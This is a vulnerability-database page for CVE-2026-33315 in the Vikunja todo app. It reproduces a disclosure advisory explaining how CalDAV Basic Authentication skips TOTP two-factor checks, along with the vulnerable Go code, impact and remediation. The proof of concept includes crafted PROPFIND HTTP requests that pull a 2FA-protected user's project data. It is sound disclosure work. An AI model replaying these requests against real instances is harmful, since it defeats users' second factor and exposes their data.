Skip to main content

Docker CVE-2026-33315

MEDIUM
Authentication Bypass Using an Alternate Path or Channel (CWE-288)
2026-03-20 https://github.com/go-vikunja/vikunja GHSA-47cr-f226-r4pq
4.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.3 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
SUSE
MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 20, 2026 - 17:30 vuln.today
Patch released
Mar 20, 2026 - 17:30 nvd
Patch available
CVE Published
Mar 20, 2026 - 17:25 nvd
MEDIUM 4.3

DescriptionGitHub Advisory

Summary

The Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc.

Details

The two files below show that when a user is accessing Caldav via Basic Authentication, it skips all steps involving 2FA. The order of operations is essentially:

  1. Retrieve basic credentials.
  2. Verify username.
  3. Verify password.
  4. Success

pkg/routes/caldav/auth.go:45

go
u, err := checkUserCaldavTokens(s, credentials)
	if user.IsErrUserDoesNotExist(err) {
		return false, nil
	}
	if u == nil {
		u, err = user.CheckUserCredentials(s, credentials)
		if err != nil {
			log.Errorf("Error during basic auth for caldav: %v", err)
			return false, nil
		}
	}

pkg/user/user.go:358

go
func CheckUserCredentials(s *xorm.Session, u *Login) (*User, error) {
	// Check if we have any credentials
	if u.Password == "" || u.Username == "" {
		return nil, ErrNoUsernamePassword{}
	}

	// Check if the user exists
	user, err := getUserByUsernameOrEmail(s, u.Username)
	if err != nil {
		// hashing the password takes a long time, so we hash something to not make it clear if the username was wrong
		_, _ = bcrypt.GenerateFromPassword([]byte(u.Username), 14)
		return nil, ErrWrongUsernameOrPassword{}
	}

	if user.Issuer != IssuerLocal {
		return user, &ErrAccountIsNotLocal{UserID: user.ID}
	}

	// The user is invalid if they need to verify their email address
	if user.Status == StatusEmailConfirmationRequired {
		return &User{}, ErrEmailNotConfirmed{UserID: user.ID}
	}

	// Check the users password
	err = CheckUserPassword(user, u.Password)
	if err != nil {
		if IsErrWrongUsernameOrPassword(err) {
			handleFailedPassword(user)
		}
		return user, err
	}

	return user, nil
}

PoC

  1. Setup a Docker instance of Vikunja v2.1.0 and create an account. Enable 2FA on the account.

<img width="1506" height="646" alt="CleanShot 2026-03-16 at 15 30 24@2x" src="https://github.com/user-attachments/assets/e88522af-4333-4758-8ba4-3e34de9680f7" />

  1. Logout of the account.
  2. Using a web proxy, such as Burp Suite, craft an HTTP request to the endpoint similar to the one shown below. Ensure that the 2FA-enabled user's username and password is properly Base64-encoded and inserted into the Authorization header.
http
PROPFIND /dav/principals/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic {{ REDACTED }}
[ TRUNCATED ]

<?xml version="1.0"?><d:propfind xmlns:d="DAV:"><d:prop><d:displayname/><d:resourcetype/></d:prop></d:propfind>
  1. Observe that the response contains authenticated user information.
http
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 16 Mar 2026 19:31:47 GMT
Content-Length: 398

<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:" xmlns:C="urn:ietf:params:xml:ns:caldav" xmlns:CS="http://calendarserver.org/ns/"><D:response><D:href>/dav/projects</D:href><D:propstat><D:prop><D:displayname>projects</D:displayname>
[ TRUNCATED ]
  1. Other requests can then be crafted to retrieve more information about a specific project, such as the one below.
http
PROPFIND /dav/projects/1/{{ PROJECT NAME }}/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic [ REDACTED ]
[TRUNCATED]

<?xml version="1.0"?><c:calendar-query xmlns:d="DAV:" xmlns:c="urn:ietf:params:xml:ns:caldav"><d:prop><d:getetag/><c:calendar-data/></d:prop><c:filter><c:comp-filter name="VCALENDAR"><c:comp-filter name="VTODO"/></c:comp-filter></c:filter></c:calendar-query>
http
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
[ TRUNCATED ]

[ TRUNCATED ]
<D:prop><C:calendar-data>BEGIN:VCALENDAR&#xA;VERSION:2.0&#xA;X-PUBLISHED-TTL:PT4H&#xA;X-WR-CALNAME:Inbox&#xA;PRODID:-//Vikunja Todo App//EN&#xA;BEGIN:VTODO&#xA;UID:8gb6eclz-dad5-4a38-80a8-09005707eb51&#xA;DTSTAMP:20260316T190905Z&#xA;SUMMARY:test&#xA;DESCRIPTION:&lt;p&gt;description&lt;/p&gt;&#xA;CREATED:20260301T203712Z&#xA;LAST-MODIFIED:20260316T190905Z&#xA;BEGIN:VALARM&#xA;TRIGGER;VALUE=DATE-TIME:20260316T130000Z&#xA;ACTION:DISPLAY&#xA;DESCRIPTION:test&#xA;END:VALARM&#xA;END:VTODO&#xA;END:VCALENDAR</C:calendar-data></D:prop><D:status>HTTP/1.1 200 OK
[ TRUNCATED ]

Impact

Any user that has 2FA enabled could have it bypassed, allowing attacker access to a lot of the user's project information.

Remediation

If there are 2FA barriers to access an account in a specific fashion, all integrations should follow those if they're using the same methods of authentication. The easiest path is probably to disable Basic Authentication for Caldav by default, but keep the token access enabled, that way users can generate tokens specifically for Caldav if they want to use that feature. Basic Auth for it could be kept, but would most likely want to be a feature flag or something along those lines. That's so users can turn it on if it's necessary, but can be notified in the documentation that it's a more unsafe pattern if 2FA is enabled.

AnalysisAI

The Vikunja todo application contains an authentication bypass vulnerability in its CalDAV endpoint that allows attackers to circumvent two-factor authentication (2FA) protections by using basic HTTP authentication. An attacker with valid username and password credentials can access CalDAV endpoints without providing a TOTP token, gaining unauthorized access to protected project information including names, descriptions, and task details. A proof-of-concept exploit has been publicly documented, and patches are available from the vendor.

Technical ContextAI

The vulnerability exists in the Vikunja API (CPE: pkg:go/code.vikunja.io_api), specifically in the CalDAV authentication handler located in pkg/routes/caldav/auth.go. The flaw is rooted in CWE-288 (Authentication Bypass Using an Alternate Path or Channel), where the CalDAV endpoint implements a separate authentication code path that bypasses the application's 2FA verification mechanisms entirely. When a user authenticates via HTTP Basic Authentication to CalDAV endpoints, the code path skips all TOTP validation steps and proceeds directly to username and password verification. The vulnerable authentication sequence in CheckUserCredentials() only validates the user's existence, password correctness, and email confirmation status, but never checks whether the user has 2FA enabled or validates the TOTP token. This creates a parallel authentication mechanism that circumvents security controls enforced in the primary application UI.

RemediationAI

Immediately upgrade Vikunja to a patched version containing commit cdf5d30a425d032f749b78b98b828f25ad882615 or later. The vendor's recommended remediation is to enforce 2FA verification in the CalDAV authentication handler, ensuring that TOTP validation occurs before granting access regardless of authentication method. As a short-term workaround if immediate patching is not feasible, disable Basic Authentication for CalDAV endpoints and require users to authenticate using generated application tokens instead, which can be managed separately from 2FA settings. Organizations should also implement network-level restrictions to CalDAV endpoints, limiting access to trusted IP ranges or requiring VPN connectivity. Enable audit logging for all CalDAV authentication attempts to detect unauthorized access patterns. Review credential security practices and consider enforcing password managers or phishing-resistant authentication methods to reduce the risk of credential compromise that could enable this attack.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-33315 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy